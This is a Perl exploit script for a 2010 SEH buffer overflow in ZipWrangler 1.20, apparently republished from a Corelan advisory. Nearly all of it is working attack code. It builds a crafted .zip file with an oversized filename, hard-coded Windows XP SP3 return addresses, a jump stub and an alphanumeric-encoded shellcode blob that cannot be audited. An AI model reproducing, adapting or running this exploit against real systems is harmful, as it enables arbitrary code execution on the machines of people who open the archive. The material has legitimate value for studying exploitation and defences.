# Title : ZipWrangler 1.20 (.zip) SEH 0day exploit
# Published : 2010-04-24
# Author : TecR0c and Sud0
#!/usr/bin/perl
# Title: ZipWrangler 1.20 (.zip) SEH 0day exploit
# Author: TecR0c & Sud0
# Date: April 24th, 2010
# Corelan Reference: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-031
# Download: http://www.softpedia.com/get/Compression-tools/ZipWrangler.shtml
# Platform: Windows XP sp3 En (VMWARE)
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
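use strict;
use warnings;

# Banner. The ASCII art is reproduced as published; some backslashes in the
# art may have been lost when the listing was transcribed and are not
# reconstructed here. Only the line terminators ("\n") are restored.
print "|-------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| security@corelan.be |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]---|\n";
print " [+] ZipWrangler 1.2 (.zip) SEH exploit\n";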
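# Local file header (30 bytes): fixed-size fields only. The oversized
# filename that triggers the overflow ($payload, 4168 bytes) is written
# directly after it; no file data follows, so CRC and sizes stay zero.
my $ldf_header = "\x50\x4B\x03\x04" .  # local file header signature "PK\x03\x04"
    "\x14\x00" .                        # version needed to extract (0x14)
    "\x00\x00" .                        # general purpose bit flag
    "\x00\x00" .                        # compression method (0 = stored)
    "\xB7\xAC" .                        # last modification time
    "\xCE\x34" .                        # last modification date
    "\x00\x00\x00\x00" .                # CRC-32 (no file data)
    "\x00\x00\x00\x00" .                # compressed size
    "\x00\x00\x00\x00" .                # uncompressed size
    "\x48\x10" .                        # filename length: 0x1048 = 4168 = 4164-byte $shellcode + ".txt"
    "\x00\x00";                         # extra field length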
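# Central directory file header (46 bytes) describing the same single entry.
# Its "filename length" must match the local header's; a second copy of
# $payload is written right after it when the archive is assembled.
my $cdf_header = "\x50\x4B\x01\x02" .  # central directory header signature "PK\x01\x02"
    "\x14\x00" .                        # version made by
    "\x14\x00" .                        # version needed to extract
    "\x00\x00" .                        # general purpose bit flag
    "\x00\x00" .                        # compression method (0 = stored)
    "\xB7\xAC" .                        # last modification time
    "\xCE\x34" .                        # last modification date
    "\x00\x00\x00\x00" .                # CRC-32 (no file data)
    "\x00\x00\x00\x00" .                # compressed size
    "\x00\x00\x00\x00" .                # uncompressed size
    "\x48\x10" .                        # filename length: 0x1048 = 4168, same as the local header
    "\x00\x00" .                        # extra field length
    "\x00\x00" .                        # file comment length
    "\x00\x00" .                        # disk number where file starts
    "\x01\x00" .                        # internal file attributes
    "\x24\x00\x00\x00" .                # external file attributes
    "\x00\x00\x00\x00";                 # relative offset of local file header (it sits at byte 0)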
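# End of central directory record (22 bytes). Both size fields follow from
# the 4168-byte filename:
#   size of CD   = 46-byte CD header + 4168 = 4214 (0x1076)
#   offset of CD = 30-byte local header + 4168 = 4198 (0x1066)
my $eofcdf_header = "\x50\x4B\x05\x06" .  # end of central directory signature "PK\x05\x06"
    "\x00\x00" .                        # number of this disk
    "\x00\x00" .                        # disk where central directory starts
    "\x01\x00" .                        # central directory records on this disk
    "\x01\x00" .                        # total central directory records
    "\x76\x10\x00\x00" .                # size of central directory = 46 + 4168 = 0x1076
    "\x66\x10\x00\x00" .                # offset of central directory = 30 + 4168 = 0x1066
    "\x00\x00";                         # zip file comment length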
# How the filename overflow is driven (authors' notes):
# the handler path executes mov edx, ds:[EAX]; 0x7FFDFD0C points at zeros in DS,
# so EDX = 0 and the following TEST EDX,EDX / JZ xxxxxx skips the faulting mov ECX, ds:[edx];
# that jump lands on a retn, which leaves the handler routine and resumes execution;
# 0x77E9025B [rpcrt4.dll, XP SP3 EN] is the value that overwrites EIP once we are back from the exception;
# bingo: the "\x83\xC0\x16\xFF\xE0" stub (add eax,0x16 ; jmp eax) then lands in the "\xcc" (int3) sled.
# shell = message box payload, alphanumeric-encoded (see $shell below).
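# Alphanumeric-encoded shellcode (a message box, according to the authors;
# the "PY" prologue — push eax / pop ecx — suggests an EAX-relative decoder).
# It is opaque and cannot be audited from this listing: only ever open the
# resulting archive in a throwaway VM.
my $shell = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8" .
    "ABuJIn9JKmK9IT4tdl4tqzrmbpzUaIYcTNkpqfPlKD66lNkpvwlLKsvgx" .
    "lKsNepNkEf4xpO4XPul3qIs1KaKOKQapLK2LgT14lKsuUlNkpTgurX6aZ" .
    "JLK1ZwhLKCjepUQzKm3p7W9LKp4nkwqzNp1kOvQKpKLLlmTo0BTTJZahO4" .
    "MuQKwxihqKOKOIoWKQlQ4Ux2UyNNkcjq4uQJKsVNk6lpKnkrzuL5QXkLKV" .
    "dNkWqM8K9qT5tglE1XC82C8EyYDNi8eMY9RCXlNpN4NhlbryxMLKOKOKOl" .
    "IqUfdOKQnN8YrPsMW7lddV2KXlKIoyoKOoycueXQxplPlEpkO3XP3VRfNu" .
    "4qxpupscUcBK8qLutWzOyIvpVyoaEETMYO2pPMkoXY22mOLOwwlWTf2kXa" .
    "NKOYokOSXPlpapnV83XQsbOT255P1kkoxaLQ4TGniKSBHQtShWPUpax0op" .
    "iCD55PhpeqhRPbLUaJiNh2lEteYOykQdqKbSbQCv12rKOXP6QO0pPKOSeV" .
    "h5ZA";

# Filename body, 4164 bytes. Layout (offsets from the start of the filename,
# roles as described in the authors' notes above):
#   0     "AA" + $shell, padded with "A" up to 4080 bytes
#   4080  0x7FFDFD0C  - points at zeros in DS, so mov edx,[eax] yields 0
#   4084  4 x nop
#   4088  0x77E9025B  - rpcrt4.dll (XP SP3 EN), overwrites EIP on return from the exception
#   4092  8 x nop
#   4100  add eax,0x16 ; jmp eax  - hops into the sled below
#   4105  59 x int3 (0xCC) - stops in a debugger, raises a breakpoint exception otherwise
# Addresses are specific to the platform in the header (XP SP3 EN, VMware).
my $pad_to = 4080;    # offset of the first control dword

# A negative repeat count would silently produce an empty string and shift
# every offset, so refuse a shellcode that does not fit the slot.
die "shellcode too long for the $pad_to-byte slot\n" if length($shell) + 2 > $pad_to;

my $shellcode = "A" x 2
    . $shell
    . "A" x ($pad_to - 2 - length($shell))
    . "\x0C\xFD\xFD\x7F"                # 0x7FFDFD0C: pointer to zeros
    . "\x90" x 4
    . "\x5b\x02\xe9\x77"                # 0x77E9025B: rpcrt4.dll
    . "\x90" x 8
    . "\x83\xC0\x16\xFF\xE0"            # add eax,0x16 ; jmp eax
    . "\xcc" x 59;                      # int3 sled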
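my $filename = "wrangler.zip";

# The crafted filename is the overflow vector: the 4164-byte $shellcode plus
# a ".txt" suffix, 4168 (0x1048) bytes in total - the value both headers
# carry as "filename length".
my $payload = $shellcode . ".txt";
print "Size : " . length($payload) . "\n";

# unlink replaces system("del $filename"): no shell is involved, it works on
# any platform, and a missing file is not an error here.
print "Removing old $filename file\n";
unlink $filename;

# Three-arg open on a lexical handle, checked; binmode so no byte of the
# archive is subject to newline translation on Windows.
print "Creating new $filename file\n";
open my $fh, '>', $filename or die "open $filename: $!";
binmode $fh;
print {$fh} $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close $fh or die "close $filename: $!";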